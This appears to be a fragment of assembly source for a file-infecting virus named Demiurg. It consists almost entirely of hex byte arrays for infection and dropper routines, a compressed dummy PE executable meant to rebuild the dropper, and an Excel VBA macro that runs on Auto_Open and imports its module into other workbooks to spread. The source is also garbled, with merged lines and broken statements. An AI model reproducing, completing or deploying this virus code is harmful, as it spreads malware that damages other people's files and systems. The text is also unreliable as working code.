DB 03CH, 033H, 0C9H, 08DH, 056H, 012H, 0CDH, 021H
DB 072H, 03EH, 089H, 046H, 010H, 0B9H
DW (Dropper_size / 512)
DB 051H, 0B4H, 03FH, 08BH, 05EH, 00, 0B9H, 000H
DB 002H, 08DH, 056H, 02EH, 0CDH, 021H, 0B4H, 040H
DB 08BH, 05EH, 010H, 0B9H, 000H, 002H, 08DH, 056H
DB 02EH, 0CDH, 021H, 059H, 0E2H, 0E2H, 0B4H, 03EH
DB 08BH, 05EH, 00Eh, 0CDH, 021H, 0B4H, 03EH, 08BH
DB 05EH, 010H, 0CDH, 021H, 0B8H, 000H, 04BH, 08BH
DB 0DDH, 08DH, 057H, 012H, 0CDH, 021H, 0EBH, 007H
DB 0B4H, 03EH, 08BH, 05EH, 00, 0CDH, 021H, 081H
DB 0C4H, 02EH, 002H, 007H, 01FH, 061H, 068H
NE_START_IP DW 0
DB 0C3H, 000H, 000H, 080H, 000H, 000H, 000H
DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 000H, 000H, 000H, 043H, 03AH, 05CH, 044H
DB 045H, 04DH, 049H, 055H, 052H, 047H, 02EH, 045HDB 058H, 045H, 000H
OUR_FILENAME DB 13 DUP (0)
SIZE_NE_VIRUS_CODE EQU ($ - NE_VIRUS_CODE)
; ------ Dropper Code ----------------------------------------- ----------------
;
This is a dummy pe file what as a limited as possible (Under 1kb) and just
Calls EXITPROCSS. It has been infected with the Virus, THE Virus Body
WAS Removed, Then Compressed and Converted to DB Instructions. this means
That all we have to do to recreate a working dropper is to expand it and
Add the Virus body (see procedure create_dropper)
Dummy_pe:
DB 04DH, 05AH, 040H, 000H, 001H, 000H, 000H, 000H
DB 004H, 000H, 000H, 000H, 001H, 0E6H, 005H, 000H
DB 042H, 04AH, 000H, 000H, 0F0H, 0FFH, 040H, 0E6H
DB 023H, 000H, 040H, 000H, 000H, 000H, 050H, 045H
DB 000H, 000H, 04CH, 001H, 001H, 0E6H, 00DH, 000H
DB 0E0H, 000H, 08EH, 081H, 00BH, 001H, 0E6H, 00EH
DB 000H, 068H, 010H, 0E6H, 00CH, 000H, 040H, 000H
DB 000H, 010H, 000H, 000H, 000H, 002H, 000H, 000H
DB 001H, 0E6H, 007H, 000H, 003H, 000H, 00ah, 0e6h
DB 006H, 000H, 060H, 000H, 000H, 000H, 002H, 0E6H
DB 006H, 000H, 002H, 0E6H, 005H, 000H, 010H, 000H
DB 000H, 020H, 0E6H, 004H, 000H, 010H, 000H, 000H
DB 010H, 0E6H, 006H, 000H, 010H, 0E6H, 00CH, 000H
DB 010H, 000H, 000H, 054H, 0E6H, 073H, 000H, 02EH
DB 064H, 065H, 06DH, 069H, 075H, 072H, 067H, 000H
DB 050H, 000H, 000H, 000H, 010H, 000H, 000H, 000H
DB 042H, 000H, 000H, 000H, 002H, 0E6H, 00Eh, 000H
DB 060H, 000H, 000H, 0E0H, 0E6H, 0A0H, 000H, 028H
DB 010H, 0E6H, 00ah, 000H, 038H, 010H, 000H, 000H
DB 030H, 010H, 0E6H, 016H, 000H, 046H, 010H, 0E6H
DB 006H, 000H, 046H, 010H, 0E6H, 006H, 000H, 04BH
DB 045H, 052H, 04EH, 045H, 04CH, 033H, 032H, 02EH
DB 064H, 06CH, 06CH, 0E6H, 004H, 000H, 045H, 078HDB 069H, 074H, 050H, 072H, 06FH, 063H, 065H, 073H
DB 073H, 0E6H, 00DH, 000H, 06AH, 000H, 0FFH, 015H
DB 030H, 010H, 040H, 000H
Dummy_pe_size EQU ($ - DUMMY_PE)
Dropper_size eq 7 17408
; ----- Macro Dropper Code ---------------------------------------- ---------
;
This is a (compressed) .XLS File That Will Be Stored in The Xlstart
Directory of Excel. IT Contains The Macro Code That Will Stay Resident in
Excel and infects other .xls files:
;
Attribute VB_Name = "Demiurg"
SUB AUTO_OPEN ()
Application.onsheetActivate = "infect"
; END SUB
Sub infect ()
Application.displayAlerts = false
;
Lastchar = ASC (MID $ (ActiveWorkbook.Name, Len (ActiveWorkbook.Name), 1))
; If ASC ("1") <= lastchar and lastchar <= ASC ("9") THEN EXIT SUB
;
; For i = 1 to ActiveWorkbook.vbProject.vbcomponents.count
If ActiveWorkbook.vbProject.vbcomponents (i) .name = "Demiurg" THEN EXIT SUB
Next I
;
ActiveWorkbook.vbProject.vbcomponents.Import ("c: /demiurg.sys")
ActiveWorkbook.save
; END SUB
Macro_Dropper:
DB 0D0H, 0CFH, 011H, 0E0H, 0A1H, 0B1H, 01AH, 0E1H
DB 0E6H, 010H, 000H, 03EH, 000H, 003H, 000H, 0FEH
DB 0FFH, 009H, 000H, 006H, 0E6H, 00BH, 000H, 001H
DB 000H, 000H, 000H, 001H, 0E6H, 008H, 000H, 010H
DB 000H, 000H, 002H, 000H, 000H, 000H, 002H, 000H
DB 000H, 000H, 0FEH, 0FFH, 0FFH, 0FFH, 0E6H, 008H
DB 000H, 0E6H, 0FFH, 0FFH, 0E6H, 0B1H, 0FFH, 0FDH
DB 0FFH, 0FFH, 0FFH, 009H, 000H, 000H, 000H, 013H
DB 000H, 000H, 000H, 004H, 000H, 000H, 000H, 005H
DB 000H, 000H, 000H, 006H, 000H, 000H, 000H, 007H
DB 000H, 000H, 000H, 008H, 000H, 000H, 000H, 00ah
DB 000H, 000H, 000H, 00BHDB 000H, 000H, 000H, 00CH, 000H, 000H, 000H, 00DH
DB 000H, 000H, 000H, 00Eh, 000H, 000H, 000H, 00FH
DB 000H, 000H, 000H, 010H, 000H, 000H, 000H, 011H
DB 000H, 000H, 000H, 012H, 000H, 000H, 000H, 014H
DB 000H, 000H, 000H, 0FEH, 0FFH, 0FFH, 0FFH, 015H
DB 000H, 000H, 000H, 016H, 000H, 000H, 000H, 017H
DB 000H, 000H, 000H, 018H, 000H, 000H, 000H, 01AH
DB 000H, 000H, 000H, 01DH, 000H, 000H, 000H, 01BH
DB 000H, 000H, 000H, 01CH, 000H, 000H, 000H, 01EH
DB 000H, 000H, 000H, 0FEH, 0FFH, 0FFH, 0FFH, 0FEH
DB 0E6H, 0FFH, 0FFH, 0E6H, 088H, 0FFH, 052H, 000H
DB 06FH, 000H, 06FH, 000H, 074H, 000H, 020H, 000H
DB 045H, 000H, 06EH, 000H, 074H, 000H, 072H, 000H
DB 079H, 0E6H, 02DH, 000H, 016H, 000H, 005H, 000H
DB 0E6H, 008H, 0FFH, 002H, 000H, 000H, 000H, 020H
DB 008H, 002H, 0E6H, 005H, 000H, 0C0H, 0E6H, 006H
DB 000H, 046H, 0E6H, 004H, 000H, 040H, 026H, 06CH
DB 034H, 03FH, 085H, 0BFH, 001H, 0C0H, 0DDH, 03CH
DB 04AH, 03FH, 085H, 0BFH, 001H, 003H, 000H, 000H
DB 000H, 080H, 02EH, 0E6H, 006H, 000H, 057H, 000H
DB 06FH, 000H, 072H, 000H, 06BH, 000H, 062H, 000H
DB 06FH, 000H, 06FH, 000H, 06BH, 0E6H, 031H, 000H
DB 012H, 000H, 002H, 001H, 00DH, 000H, 000H, 000H
DB 0E6H, 008H, 0FFH, 0E6H, 028H, 000H, 092H, 00AH
DB 0E6H, 006H, 000H, 05FH, 000H, 056H, 000H, 042H
DB 000H, 041H, 000H, 05FH, 000H, 050H, 000H, 052H
DB 000H, 04FH, 000H, 04AH, 000H, 045H, 000H, 043H
DB 000H, 054H, 000H, 05FH, 000H, 043H, 000H, 055H
DB 000H, 052H, 0E6H, 021H, 000H, 022H, 000H, 001H
DB 001H, 001H, 000H, 000H, 000H, 00BH, 000H, 000H
DB 000H, 00ah, 0e6h, 017h, 000H, 0A0H, 03CH, 035H
DB 04AH, 03FH, 085H, 0BFH, 001H, 0C0H, 0DDH, 03CH
DB 04AH, 03FH, 085H, 0BFH, 001H, 0E6H, 00CH, 000H
DB 056H, 000H, 042H, 000H, 041H, 0E6H, 03BH, 000HDB 008H, 000H, 001H, 000H, 0E6H, 008H, 0FFH, 005H
DB 0E6H, 017H, 000H, 0A0H, 03CH, 035H, 04AH, 03FH
DB 085H, 0BFH, 001H, 0A0H, 03CH, 035H, 04AH, 03FH
DB 085H, 0BFH, 001H, 0E6H, 00CH, 000H, 001H, 000H
DB 000H, 000H, 002H, 000H, 000H, 000H, 003H, 000H
DB 000H, 000H, 004H, 000H, 000H, 000H, 005H, 000H
DB 000H, 000H, 006H, 000H, 000H, 000H, 007H, 000H
DB 000H, 000H, 008H, 000H, 000H, 000H, 009H, 000H
DB 000H, 000H, 00ah, 000H, 000H, 000H, 00BH, 000H
DB 000H, 000H, 00CH, 000H, 000H, 000H, 00DH, 000H
DB 000H, 000H, 00EH, 000H, 000H, 000H, 00Fh, 000H
DB 000H, 000H, 010H, 000H, 000H, 000H, 011H, 000H
DB 000H, 000H, 012H, 000H, 000H, 000H, 013H, 000H
DB 000H, 000H, 014H, 000H, 000H, 000H, 015H, 000H
DB 000H, 000H, 016H, 000H, 000H, 000H, 017H, 000H
DB 000H, 000H, 018H, 000H, 000H, 000H, 019H, 000H
DB 000H, 000H, 01AH, 000H, 000H, 000H, 01BH, 000H
DB 000H, 000H, 01CH, 000H, 000H, 000H, 01DH, 000H
DB 000H, 000H, 01EH, 000H, 000H, 000H, 01FH, 000H
DB 000H, 000H, 020H, 000H, 000H, 000H, 021H, 000H
DB 000H, 000H, 022H, 000H, 000H, 000H, 023H, 000H
DB 000H, 000H, 024H, 000H, 000H, 000H, 025H, 000H
DB 000H, 000H, 026H, 000H, 000H, 000H, 027H, 000H
DB 000H, 000H, 028H, 000H, 000H, 000H, 029H, 000H
DB 000H, 000H, 02AH, 000H, 000H, 000H, 0FEH, 0FFH
DB 0FFH, 0FFH, 02CH, 000H, 000H, 000H, 02DH, 000H
DB 000H, 000H, 02EH, 000H, 000H, 000H, 02FH, 000H
DB 000H, 000H, 030H, 000H, 000H, 000H, 031H, 000H
DB 000H, 000H, 032H, 000H, 000H, 000H, 033H, 000H
DB 000H, 000H, 034H, 000H, 000H, 000H, 035H, 000H
DB 000H, 000H, 036H, 000H, 000H, 000H, 037H, 000H
DB 000H, 000H, 038H, 000H, 000H, 000H, 039H, 000H
DB 000H, 000H, 03AH, 000H, 000H, 000H, 0FEH, 0FFH
DB 0FFH, 0FFH, 03CH, 000H, 000H, 000H, 03EH, 000H, 000H, 000H, 03FH, 000H
DB 000H, 000H, 040H, 000H, 000H, 000H, 041H, 000H
DB 000H, 000H, 042H, 000H, 000H, 000H, 043H, 000H
DB 000H, 000H, 044H, 000H, 000H, 000H, 045H, 000H
DB 000H, 000H, 046H, 000H, 000H, 000H, 047H, 000H
DB 000H, 000H, 048H, 000H, 000H, 000H, 049H, 000H
DB 000H, 000H, 0FEH, 0FFH, 0FFH, 0FFH, 04BH, 000H
DB 000H, 000H, 04CH, 000H, 000H, 000H, 04DH, 000H
DB 000H, 000H, 04EH, 000H, 000H, 000H, 04FH, 000H
DB 000H, 000H, 050H, 000H, 000H, 000H, 051H, 000H
DB 000H, 000H, 052H, 000H, 000H, 000H, 053H, 000H
DB 000H, 000H, 054H, 000H, 000H, 000H, 055H, 000H
DB 000H, 000H, 056H, 000H, 000H, 000H, 057H, 000H
DB 000H, 000H, 058H, 000H, 000H, 000H, 059H, 000H
DB 000H, 000H, 05AH, 000H, 000H, 000H, 05BH, 000H
DB 000H, 000H, 05CH, 000H, 000H, 000H, 05DH, 000H
DB 000H, 000H, 05EH, 000H, 000H, 000H, 05FH, 000H
DB 000H, 000H, 060H, 000H, 000H, 000H, 061H, 000H
DB 000H, 000H, 062H, 000H, 000H, 000H, 063H, 000H
DB 000H, 000H, 064H, 000H, 000H, 000H, 065H, 000H
DB 000H, 000H, 066H, 000H, 000H, 000H, 0FEH, 0FFH
DB 0FFH, 0FFH, 068H, 000H, 000H, 000H, 069H, 000H
DB 000H, 000H, 06AH, 000H, 000H, 000H, 06BH, 000H
DB 000H, 000H, 06CH, 000H, 000H, 000H, 06DH, 000H
DB 000H, 000H, 06EH, 000H, 000H, 000H, 06FH, 000H
DB 000H, 000H, 070H, 000H, 000H, 000H, 071H, 000H
DB 000H, 000H, 072H, 000H, 000H, 000H, 073H, 000H
DB 000H, 000H, 074H, 000H, 000H, 000H, 075H, 000H
DB 000H, 000H, 076H, 000H, 000H, 000H, 077H, 000H
DB 000H, 000H, 078H, 000H, 000H, 000H, 079H, 000H
DB 000H, 000H, 07AH, 000H, 000H, 000H, 07BH, 000H
DB 000H, 000H, 07CH, 000H, 000H, 000H, 07DH, 000H
DB 000H, 000H, 07EH, 000H, 000H, 000H, 07FH, 000H
DB 000H, 000H, 080H, 000H, 000H, 000H, 009H, 008HDB 010H, 000H, 000H, 006H, 005H, 000H, 0D3H, 010H
DB 0CCH, 007H, 041H, 000H, 000H, 000H, 006H, 000H
DB 000H, 000H, 0e1H, 000H, 002H, 000H, 0B0H, 004H
DB 0C1H, 000H, 002H, 000H, 000H, 000H, 0E2H, 000H
DB 000H, 000H, 05CH, 000H, 070H, 000H, 001H, 000H
DB 000H, 042H, 0E6H, 06CH, 020H, 042H, 000H, 002H
DB 000H, 0B0H, 004H, 061H, 001H, 002H, 000H, 000H
DB 000H, 03DH, 001H, 002H, 000H, 001H, 000H, 0D3H
DB 000H, 000H, 000H, 0BAH, 001H, 014H, 000H, 011H
DB 000H, 000H, 044H, 069H, 065H, 073H, 065H, 041H
DB 072H, 062H, 065H, 069H, 074H, 073H, 06DH, 061H
DB 070H, 070H, 065H, 09CH, 000H, 002H, 000H, 00Eh
DB 000H, 019H, 000H, 002H, 000H, 000H, 000H, 012H
DB 000H, 002H, 000H, 000H, 000H, 013H, 000H, 002H
DB 000H, 000H, 000H, 0AFH, 001H, 002H, 000H, 000H
DB 000H, 0BCH, 001H, 002H, 000H, 000H, 000H, 03DH
DB 000H, 012H, 000H, 0F0H, 000H, 087H, 000H, 0DCH
DB 023H, 094H, 011H, 039H, 0E6H, 005H, 000H, 001H
DB 000H, 058H, 002H, 040H, 000H, 002H, 000H, 000H
DB 000H, 08DH, 000H, 002H, 000H, 000H, 000H, 022H
DB 000H, 002H, 000H, 000H, 000H, 00Eh, 000H, 002H
DB 000H, 001H, 000H, 0B7H, 001H, 002H, 000H, 000H
DB 000H, 0DAH, 000H, 002H, 000H, 000H, 000H, 031H
DB 000H, 01AH, 000H, 0C8H, 000H, 000H, 000H, 0FFH
DB 07FH, 090H, 001H, 0E6H, 006H, 000H, 005H, 001H
DB 041H, 000H, 072H, 000H, 069H, 000H, 061H, 000H
DB 06CH, 000H, 031H, 000H, 01AH, 000H, 0C8H, 000H
DB 000H, 000H, 0FFH, 07FH, 090H, 001H, 0E6H, 006H
DB 000H, 005H, 001H, 041H, 000H, 072H, 000H, 069H
DB 000H, 061H, 000H, 06CH, 000H, 031H, 000H, 01AH
DB 000H, 0C8H, 000H, 000H, 000H, 0FFH, 07FH, 090H
DB 001H, 0E6H, 006H, 000H, 005H, 001H, 041H, 000H
DB 072H, 000H, 069H, 000H, 061H, 000H, 06CH, 000H
DB 031H, 000H, 01AH, 000H, 0C8H, 000H, 000H, 000HDB 0FFH, 07FH, 090H, 001H, 0E6H, 006H, 000H, 005H
DB 001H, 041H, 000H, 072H, 000H, 069H, 000H, 061H
DB 000H, 06CH, 000H, 01EH, 004H, 01EH, 000H, 005H
DB 000H, 019H, 000H, 000H, 022H, 0F6H, 053H, 022H
DB 05CH, 020H, 023H, 02CH, 023H, 023H, 030H, 03BH
DB 05CH, 02DH, 022H, 0F6H, 053H, 022H, 05CH, 020H
DB 023H, 02CH, 023H, 023H, 030H, 01EH, 004H, 023H
DB 000H, 006H, 000H, 01EH, 000H, 000H, 022H, 0F6H
DB 053H, 022H, 05CH, 020H, 023H, 02CH, 023H, 023H
DB 030H, 03BH, 05BH, 052H, 065H, 064H, 05DH, 05CH
DB 02DH, 022H, 0F6H, 053H, 022H, 05CH, 020H, 023H
DB 02CH, 023H, 023H, 030H, 01EH, 004H, 024H, 000H
DB 007H, 000H, 01FH, 000H, 000H, 022H, 0F6H, 053H
DB 022H, 05CH, 020H, 023H, 02CH, 023H, 023H, 030H
DB 02EH, 030H, 030H, 03BH, 05CH, 02DH, 022H, 0F6H
DB 053H, 022H, 05CH, 020H, 023H, 02CH, 023H, 023H
DB 030H, 02EH, 030H, 030H, 01EH, 004H, 029H, 000H
DB 008H, 000H, 024H, 000H, 000H, 022H, 0F6H, 053H
DB 022H, 05CH, 020H, 023H, 02CH, 023H, 023H, 030H
DB 02EH, 030H, 030H, 03BH, 05BH, 052H, 065H, 064H
DB 05DH, 05CH, 02DH, 022H, 0F6H, 053H, 022H, 05CH
DB 020H, 023H, 02CH, 023H, 023H, 030H, 02EH, 030H
DB 030H, 01EH, 004H, 03EH, 000H, 02AH, 000H, 039H
DB 000H, 000H, 05FH, 02DH, 022H, 0F6H, 053H, 022H
DB 05CH, 020H, 02AH, 020H, 023H, 02CH, 023H, 023H
DB 030H, 05FH, 02DH, 03BH, 05CH, 02DH, 022H, 0F6H
DB 053H, 022H, 05CH, 020H, 02AH, 020H, 023H, 02CH
DB 023H, 023H, 030H, 05FH, 02DH, 03BH, 05FH, 02DH
DB 022H, 0F6H, 053H, 022H, 05CH, 020H, 02AH, 020H
DB 022H, 02DH, 022H, 05FH, 02DH, 03BH, 05FH, 02DH
DB 040H, 05FH, 02DH, 01EH, 004H, 02CH, 000H, 029H
DB 000H, 027H, 000H, 000H, 05FH, 02DH, 02AH, 020H
DB 023H, 02CH, 023H, 023H, 030H, 05FH, 02DH, 03BH
DB 05CH, 02DH, 02AH, 020H, 023H, 02CH, 023H, 023HDB 030H, 05FH, 02DH, 03BH, 05FH, 02DH, 02AH, 020H
DB 022H, 02DH, 022H, 05FH, 02DH, 03BH, 05FH, 02DH
DB 040H, 05FH, 02DH, 01EH, 004H, 046H, 000H, 02CH
DB 000H, 041H, 000H, 000H, 05FH, 02DH, 022H, 0F6H
DB 053H, 022H, 05CH, 020H, 02AH, 020H, 023H, 02CH
DB 023H, 023H, 030H, 02EH, 030H, 030H, 05FH, 02DH
DB 03BH, 05CH, 02DH, 022H, 0F6H, 053H, 022H, 05CH
DB 020H, 02AH, 020H, 023H, 02CH, 023H, 023H, 030H
DB 02EH, 030H, 030H, 05FH, 02DH, 03BH, 05FH, 02DH
DB 022H, 0F6H, 053H, 022H, 05CH, 020H, 02AH, 020H
DB 022H, 02DH, 022H, 03FH, 03FH, 05FH, 02DH, 03BH
DB 05FH, 02DH, 040H, 05FH, 02DH, 01EH, 004H, 034H
DB 000H, 02BH, 000H, 02FH, 000H, 000H, 05FH, 02DH
DB 02AH, 020H, 023H, 02CH, 023H, 023H, 030H, 02EH
DB 030H, 030H, 05FH, 02DH, 03BH, 05CH, 02DH, 02AH
DB 020H, 023H, 02CH, 023H, 023H, 030H, 02EH, 030H
DB 030H, 05FH, 02DH, 03BH, 05FH, 02DH, 02AH, 020H
DB 022H, 02DH, 022H, 03FH, 03FH, 05FH, 02DH, 03BH
DB 05FH, 02DH, 040H, 05FH, 02DH, 0E0H, 000H, 014H
DB 0E6H, 005H, 000H, 0F5H, 0FFH, 020H, 0E6H, 00BH
DB 000H, 0C0H, 020H, 0E0H, 000H, 014H, 000H, 001H
DB 000H, 000H, 000H, 0F5H, 0FFH, 020H, 000H, 000H
DB 0F4H, 0E6H, 008H, 000H, 0C0H, 020H, 0E0H, 000H
DB 014H, 000H, 001H, 000H, 000H, 000H, 0F5H, 0FFH
DB 020H, 000H, 000H, 0F4H, 0E6H, 008H, 000H, 0C0H
DB 020H, 0E0H, 000H, 014H, 000H, 002H, 000H, 000H
DB 000H, 0F5H, 0FFH, 020H, 000H, 000H, 0F4H, 0E6H
DB 008H, 000H, 0C0H, 020H, 0E0H, 000H, 014H, 000H
DB 002H, 000H, 000H, 000H, 0F5H, 0FFH, 020H, 000H
DB 000H, 0F4H, 0E6H, 008H, 000H, 0C0H, 020H, 0E0H
DB 000H, 014H, 0E6H, 005H, 000H, 0F5H, 0FFH, 020H
DB 000H, 000H, 0F4H, 0E6H, 008H, 000H, 0C0H, 020H
DB 0E0H, 000H, 014H, 0E6H, 005H, 000H, 0F5H, 0FFH
DB 020H, 000H, 000H, 0F4H, 0E6H, 008H, 000H, 0C0HDB 020H, 0E0H, 000H, 014H, 0E6H, 005H, 000H, 0F5H
DB 0FFH, 020H, 000H, 000H, 0F4H, 0E6H, 008H, 000H
DB 0C0H, 020H, 0E0H, 000H, 014H, 0E6H, 005H, 000H
DB 0F5H, 0FFH, 020H, 000H, 000H, 0F4H, 0E6H, 008H
DB 000H, 0C0H, 020H, 0E0H, 000H, 014H, 0E6H, 005H
DB 000H, 0F5H, 0FFH, 020H, 000H, 000H, 0F4H, 0E6H
DB 008H, 000H, 0C0H, 020H, 0E0H, 000H, 014H, 0E6H
DB 005H, 000H, 0F5H, 0FFH, 020H, 000H, 000H, 0F4H
DB 0E6H, 008H, 000H, 0C0H, 020H, 0E0H, 000H, 014H
DB 0E6H, 005H, 000H, 0F5H, 0FFH, 020H, 000H, 000H
DB 0F4H, 0E6H, 008H, 000H, 0C0H, 020H, 0E0H, 000H
DB 014H, 0E6H, 005H, 000H, 0F5H, 0FFH, 020H, 000H
DB 000H, 0F4H, 0E6H, 008H, 000H, 0C0H, 020H, 0E0H
DB 000H, 014H, 0E6H, 005H, 000H, 0F5H, 0FFH, 020H
DB 000H, 000H, 0F4H, 0E6H, 008H, 000H, 0C0H, 020H
DB 0E0H, 000H, 014H, 0E6H, 005H, 000H, 0F5H, 0FFH
DB 020H, 000H, 000H, 0F4H, 0E6H, 008H, 000H, 0C0H
DB 020H, 0E0H, 000H, 014H, 0E6H, 005H, 000H, 001H
DB 000H, 020H, 0E6H, 00BH, 000H, 0C0H, 020H, 0E0H
DB 000H, 014H, 000H, 001H, 000H, 02BH, 000H, 0F5H
DB 0FFH, 020H, 000H, 000H, 0F8H, 0E6H, 008H, 000H
DB 0C0H, 020H, 0E0H, 000H, 014H, 000H, 001H, 000H
DB 029H, 000H, 0F5H, 0FFH, 020H, 000H, 000H, 0F8H
DB 0E6H, 008H, 000H, 0C0H, 020H, 0E0H, 000H, 014H
DB 000H, 001H, 000H, 009H, 000H, 0F5H, 0FFH, 020H
DB 000H, 000H, 0F8H, 0E6H, 008H, 000H, 0C0H, 020H
DB 0E0H, 000H, 014H, 000H, 001H, 000H, 02CH, 000H
DB 0F5H, 0FFH, 020H, 000H, 000H, 0F8H, 0E6H, 008H
DB 000H, 0C0H, 020H, 0E0H, 000H, 014H, 000H, 001H
DB 000H, 02AH, 000H, 0F5H, 0FFH, 020H, 000H, 000H
DB 0F8H, 0E6H, 008H, 000H, 0C0H, 020H, 093H, 002H
DB 004H, 000H, 010H, 080H, 003H, 0FFH, 093H, 002H
DB 004H, 000H, 011H, 080H, 006H, 0FFH, 093H, 002H
DB 004H, 000H, 012H, 080H, 005H, 0FFH, 093H, 002HDB 004H, 000H, 000H, 080H, 000H, 0FH, 093H, 002H
DB 004H, 000H, 013H, 080H, 004H, 0FFH, 093H, 002H
DB 004H, 000H, 014H, 080H, 007H, 0FFH, 060H, 001H
DB 002H, 000H, 001H, 000H, 085H, 000H, 010H, 000H
DB 086H, 009H, 0E6H, 004H, 000H, 008H, 000H, 054H
DB 061H, 062H, 065H, 06CH, 06CH, 065H, 031H, 08CH
DB 000H, 004H, 000H, 031H, 000H, 02BH, 000H, 0FCH
DB 000H, 008H, 0E6H, 009H, 000H, 0FFH, 000H, 0FAH
DB 003H, 008H, 000H, 0FFH, 0FFH, 040H, 000H, 000H
DB 000H, 040H, 010H, 045H, 000H, 000H, 000H, 040H
DB 000H, 001H, 000H, 000H, 000H, 00CH, 000H, 040H
DB 000H, 051H, 004H, 0E6H, 00ah, 000H, 085H, 084H
DB 0F7H, 0BFH, 001H, 000H, 000H, 000H, 09CH, 084H
DB 0F7H, 0BFH, 000H, 000H, 040H, 000H, 001H, 000H
DB 000H, 000H, 038H, 0C6H, 062H, 0E6H, 005H, 000H
DB 001H, 0E6H, 007H, 000H, 005H, 040H, 000H, 080H
DB 002H, 094H, 0F7H, 0BFH, 000H, 000H, 040H, 000H
DB 004H, 000H, 000H, 000H, 0E0H, 006H, 09CH, 000H
DB 00ah, 000H, 000H, 000H, 020H, 000H, 000H, 000H
DB 0FAH, 07EH, 070H, 030H, 00ah, 000H, 000H, 000H
DB 00ah, 000H, 000H, 000H, 007H, 00CH, 000H, 000H
DB 001H, 000H, 000H, 000H, 0E8H, 006H, 09CH, 000H
DB 0B4H, 0C5H, 062H, 0E6H, 00DH, 000H, 0E6H, 008H
DB 0FFH, 09CH, 030H, 075H, 0E6H, 005H, 000H, 069H
DB 000H, 075H, 000H, 0FFH, 0FFH, 0FFH, 0E7H, 0E6H
DB 004H, 000H, 05CH, 000H, 063H, 000H, 005H, 000H
DB 000H, 000H, 05CH, 000H, 064H, 000H, 065H, 000H
DB 06DH, 000H, 003H, 0E6H, 007H, 000H, 028H, 0D0H
DB 09DH, 030H, 0E6H, 008H, 000H, 0E6H, 004H, 0FFH
DB 0E6H, 014H, 000H, 002H, 007H, 002H, 002H, 0E6H
DB 004H, 0FFH, 0E6H, 004H, 000H, 003H, 000H, 000H
DB 000H, 070H, 000H, 07EH, 030H, 0C3H, 07CH, 070H
DB 030H, 004H, 000H, 000H, 000H, 004H, 0E6H, 007H
DB 000H, 001H, 000H, 000H, 000H, 04EH, 087H, 075HDB 000H, 082H, 0D8H, 07EH, 030H, 003H, 000H, 000H
DB 000H, 003H, 0E6H, 00BH, 000H, 061H, 07AH, 070H
DB 030H, 0D4H, 006H, 09CH, 000H, 00ah, 000H, 000H
DB 000H, 0A0H, 0C5H, 062H, 000H, 00ah, 000H, 000H
DB 000H, 001H, 000H, 000H, 000H, 00ah, 000H, 000H
DB 000H, 0A0H, 0C5H, 062H, 000H, 0D4H, 006H, 09CH
DB 000H, 00AH, 0E6H, 00BH, 000H, 028H, 0D0H, 09DH
DB 030H, 0E6H, 008H, 000H, 002H, 000H, 000H, 000H
DB 0FFH, 003H, 000H, 000H, 001H, 000H, 000H, 000H
DB 001H, 000H, 000H, 000H, 001H, 000H, 000H, 000H
DB 020H, 010H, 000H, 000H, 018H, 0E6H, 007H, 000H
DB 084H, 0F6H, 053H, 030H, 05CH, 0C5H, 062H, 000H
DB 05DH, 0E6H, 007H, 000H, 002H, 000H, 0C8H, 030H
DB 000H, 000H, 0C5H, 030H, 0E6H, 004H, 000H, 061H
DB 07AH, 070H, 030H, 04CH, 087H, 075H, 000H, 004H
DB 000H, 000H, 000H, 07EH, 00Eh, 002H, 002H, 0E1H
DB 03CH, 06DH, 030H, 016H, 000H, 0C8H, 030H, 0D3H
DB 000H, 000H, 000H, 09EH, 0C5H, 062H, 000H, 0FCH
DB 000H, 000H, 000H, 009H, 000H, 000H, 000H, 0CDH
DB 015H, 004H, 030H, 000H, 000H, 0C5H, 030H, 004H
DB 02AH, 0C8H, 030H, 039H, 015H, 000H, 030H, 007H
DB 00CH, 000H, 000H, 001H, 000H, 000H, 000H, 0D4H
DB 006H, 09CH, 000H, 00ah, 000H, 000H, 000H, 0A0H
DB 0C5H, 062H, 000H, 00ah, 000H, 000H, 000H, 0D0H
DB 006H, 09CH, 0E6H, 005H, 000H, 0A0H, 0C7H, 062H
DB 000H, 05DH, 0E6H, 007H, 000H, 08EH, 08FH, 00FH
DB 030H, 0E6H, 004H, 000H, 09CH, 0C5H, 062H, 000H
DB 00BH, 000H, 000H, 000H, 0E6H, 004H, 0FFH, 070H
DB 006H, 09CH, 000H, 0DCH, 0C7H, 062H, 000H, 004H
DB 000H, 000H, 000H, 00BH, 000H, 057H, 000H, 0E4H
DB 000H, 068H, 000H, 072H, 000H, 075H, 000H, 06EH
DB 000H, 067H, 000H, 020H, 000H, 05BH, 000H, 030H
DB 000H, 05DH, 000H, 000H, 000H, 05FH, 000H, 000H
DB 000H, 001H, 000H, 008H, 000H, 09AH, 00DH, 0E6HDB 004H, 000H, 0AEH, 082H, 070H, 030H, 007H, 00CH
DB 000H, 000H, 001H, 000H, 000H, 000H, 04CH, 087H
DB 075H, 000H, 004H, 000H, 000H, 000H, 080H, 0D8H
DB 07EH, 030H, 004H, 000H, 000H, 000H, 0AEH, 082H
DB 070H, 030H, 007H, 00CH, 000H, 000H, 001H, 000H
DB 000H, 000H, 064H, 000H, 098H, 000H, 002H, 000H
DB 000H, 000H, 065H, 010H, 000H, 030H, 064H, 000H
DB 098H, 000H, 096H, 06AH, 054H, 030H, 004H, 000H
DB 000H, 000H, 0D9H, 010H, 000H, 030H, 096H, 06AH
DB 054H, 030H, 052H, 070H, 054H, 030H, 0C2H, 0C8H
DB 010H, 030H, 096H, 01AH, 09AH, 000H, 050H, 000H
DB 098H, 000H, 065H, 010H, 000H, 030H, 050H, 000H
DB 098H, 000H, 096H, 01AH, 09AH, 000H, 002H, 000H
DB 000H, 000H, 0DDH, 088H, 00FH, 030H, 096H, 01AH
DB 09AH, 000H, 050H, 000H, 098H, 000H, 001H, 000H
DB 000H, 000H, 060H, 01AH, 09AH, 0E6H, 005H, 000H
DB 008H, 000H, 098H, 000H, 0FCH, 001H, 098H, 0E6H
DB 009H, 000H, 0A4H, 01AH, 09AH, 0E6H, 00DH, 000H
DB 03FH, 0E6H, 007H, 000H, 0B0H, 0C6H, 062H, 000H
DB 039H, 086H, 00FH, 030H, 006H, 000H, 000H, 000H
DB 060H, 01AH, 09AH, 000H, 02DH, 000H, 000H, 000H
DB 007H, 000H, 000H, 000H, 006H, 002H, 098H, 000H
DB 0DEH, 0C7H, 062H, 000H, 0DCH, 0C7H, 062H, 000H
DB 008H, 000H, 098H, 000H, 007H, 000H, 000H, 000H
DB 03DH, 000H, 000H, 000H, 0CEH, 05AH, 054H, 030H
